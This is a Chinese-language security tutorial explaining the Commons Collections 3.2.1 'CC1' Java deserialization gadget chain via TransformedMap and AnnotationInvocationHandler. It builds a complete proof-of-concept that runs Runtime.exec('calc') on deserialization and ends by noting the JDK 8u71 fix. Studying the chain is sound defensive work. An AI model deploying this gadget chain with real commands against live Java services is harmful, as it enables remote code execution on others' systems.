CC1-TransformedMap

PreviousCommons Collection 🥏NextCC1-LazyMap

Last updated 1 year ago

Was this helpful?

CC1-TransformedMap

0x01 Environment Build

JDK版本：jdk 8u65

<dependency>
    <groupId>commons-collections</groupId>
    <artifactId>commons-collections</artifactId>
    <version>3.2.1</version>
</dependency>

源码里面都是.class文件，反编译的代码不好阅读，需下载.java源码，解压jdk8u65的src.zip，将下载后的源码（src\share\classes）的sun文件夹拷贝到解压后的src文件夹

IDEA =》Project Structure =》Platform Settings =》 SDKs =》8u65 =》 SourcePath

另外Maven下载的Commons Collection 也是.class文件，点击Download Sources

若无效试试dependency:resolve -Dclassifier=sources

0x02 Transformer Glance

Transformer
```
public interface Transformer {
    public Object transform(Object input);
}
```
Transformer是一个接口，预定义的transform()方法能接受任意类型参数接口下面有几个重要的实现类，且都实现了Serializable接口。

ConstantTransformer

public class ConstantTransformer implements Transformer, Serializable {
    private final Object iConstant;
    public ConstantTransformer(Object constantToReturn) {
        super();
        iConstant = constantToReturn;
    }
    public Object transform(Object input) {
        return iConstant;
    }
}

调用transform()方法返回构造时传入的对象就是传入传出一个对象，前后不变。

InvokerTransformer

public class InvokerTransformer implements Transformer, Serializable {
    public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
        super();
        iMethodName = methodName;
        iParamTypes = paramTypes;
        iArgs = args;
    }
    public Object transform(Object input) {
        if (input == null) {
            return null;
        }
        try {
            Class cls = input.getClass();
            Method method = cls.getMethod(iMethodName, iParamTypes);
            return method.invoke(input, iArgs);
        } // catch ....
    }
}

反序列化利用的关键类，可以执行任意方法。

iMethodName 待执行的方法名
iParamTypes 待执行方法的参数列表的参数类型
iArgs 待执行方法的参数列表

调用transform的时候会执行input对象的iMethodName方法

ChainedTransformer

public class ChainedTransformer implements Transformer, Serializable {
    public ChainedTransformer(Transformer[] transformers) {
        super();
        iTransformers = transformers;
    }
    public Object transform(Object object) {
        for (int i = 0; i < iTransformers.length; i++) {
            object = iTransformers[i].transform(object);
        }
        return object;
    }
}

将多个Transformer串成一条链，前一个调用返回的结果作为后一个调用的参数

TransformedMap

public class TransformedMap{
    public static Map decorate(Map map, Transformer keyTransformer, Transformer valueTransformer) {
        return new TransformedMap(map, keyTransformer, valueTransformer);
    }
    protected TransformedMap(Map map, Transformer keyTransformer, Transformer valueTransformer) {
        super(map);
        this.keyTransformer = keyTransformer;
        this.valueTransformer = valueTransformer;
    }
    protected Object checkSetValue(Object value) {
        return valueTransformer.transform(value);
    }
}

TransformedMap用于对Java原生Map进行一些修饰，当Map调用setValue时，会触发checkSetValue，进而调用transform。其构造方法被protected修饰，因此我们利用它的静态public方法decorate

0x03 Best Practice

使用Transformer的实现类和TransformedMap实现命令执行

Transformer[] transformers = new Transformer[]{
    new ConstantTransformer(Runtime.getRuntime()),
    new InvokerTransformer("exec", new Class[]{String.class}, new String[]{"calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
Map<Object, Object> map = new HashedMap();
Map<Object, Object> evilMap = TransformedMap.decorate(map, null, chainedTransformer);
evilMap.put("test", 123);

两个问题：

Runtime类没有实现Serializable接口，无法反序列化
需要找到readObject中有类似Map.put(xxx,yyy)操作的类

Q1：Class类可以反序列化，用Runtime.class作为ChainedTransformer的入口参数，后面再通过反射来调用exec

Transformer[] transformers = new Transformer[]{
    new ConstantTransformer(Runtime.class),
    new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
    new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{Runtime.class, null}),
    new InvokerTransformer("exec", new Class[]{String.class}, new String[]{"calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
Map<Object, Object> map = new HashedMap();
Map<Object, Object> evilMap = TransformedMap.decorate(map, null, chainedTransformer);
evilMap.put("test", 123);

Q2：Introducing ~ AnnotationInvocationHandler

// sun.reflect.annotation.AnnotationInvocationHandler#readObject
private void readObject(java.io.ObjectInputStream s) {
    s.defaultReadObject();

    // Check to make sure that types have not evolved incompatibly

    AnnotationType annotationType = null;
    try {
        annotationType = AnnotationType.getInstance(type);
    } catch(IllegalArgumentException e) {
        // Class is no longer an annotation type; time to punch out
        throw new java.io.InvalidObjectException("Non-annotation type in annotation serial stream");
    }

    Map<String, Class<?>> memberTypes = annotationType.memberTypes();

    // If there are annotation members without values, that
    // situation is handled by the invoke method.
    for (Map.Entry<String, Object> memberValue : memberValues.entrySet()) {
        String name = memberValue.getKey();
        Class<?> memberType = memberTypes.get(name);
        if (memberType != null) {  // i.e. member still exists
            Object value = memberValue.getValue();
            if (!(memberType.isInstance(value) ||
                  value instanceof ExceptionProxy)) {
                memberValue.setValue(
                    new AnnotationTypeMismatchExceptionProxy(
                        value.getClass() + "[" + value + "]").setMember(
                        annotationType.members().get(name)));
            }
        }
    }
}

memberValue.setValue =》TransformedMap#checkSetValue =》 valueTransformer.transform()

因此让memberValue为上面的evilMap即可。

PROBLEM THROW：
需要满足memberType != null才能进入memberValue.setValue

Class<?> memberType = memberTypes.get(name);

memberTypes👇

name👇

Map<String, Class<?>> memberTypes = annotationType.memberTypes(); String name = memberValue.getKey();

annotationType👇

annotationType = AnnotationType.getInstance(type);

构造函数：

AnnotationInvocationHandler(Class<? extends Annotation> type, Map<String, Object> memberValues)

type是构造对象时传进来的Annotation子类的Class name是传入Map（memberValues）的每个键名

memberType.get(name)要不为空即要求AnnotationType要有名为name的成员

System.out.println(AnnotationType.getInstance(Target.class).memberTypes());
// {value=class [Ljava.lang.annotation.ElementType;}
System.out.println(AnnotationType.getInstance(Retention.class).memberTypes());
// {value=class java.lang.annotation.RetentionPolicy}

@Retention和@Target都有value这个成员

另外，AnnotationInvocationHandler的构造方法被default修饰，不能直接new，利用反射来实例化该类

0x04 Weave POC

Transformer[] transformers = new Transformer[]{
    new ConstantTransformer(Runtime.class),
    new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
    new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{Runtime.class, null}),
    new InvokerTransformer("exec", new Class[]{String.class}, new String[]{"calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
Map<Object, Object> map = new HashedMap();
map.put("value", 123);
Map<Object, Object> evilMap = TransformedMap.decorate(map, null, chainedTransformer);
Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor cons = clazz.getDeclaredConstructor(Class.class, Map.class);
cons.setAccessible(true);
Object aih = cons.newInstance(Target.class, evilMap);

// 序列化
ByteArrayOutputStream baos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(baos);
oos.writeObject(aih);
oos.close();

// 反序列化
ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(baos.toByteArray()));
Object o = (Object) ois.readObject();
ois.close();

0x05 CC1 Shortcomings

sun.reflect.annotation.AnnotationInvocationHandler作为CC1链的入口类，在Java 8u71之后被修改了修改后的readObject方法中新建了一个LinkedHashMap对象，并将原来的键值添加进去。所以，后续对Map的操作都是基于这个新的LinkedHashMap对象，而原来我们精心构造的Map不再执行setValue或put操作，也就不会触发RCE了。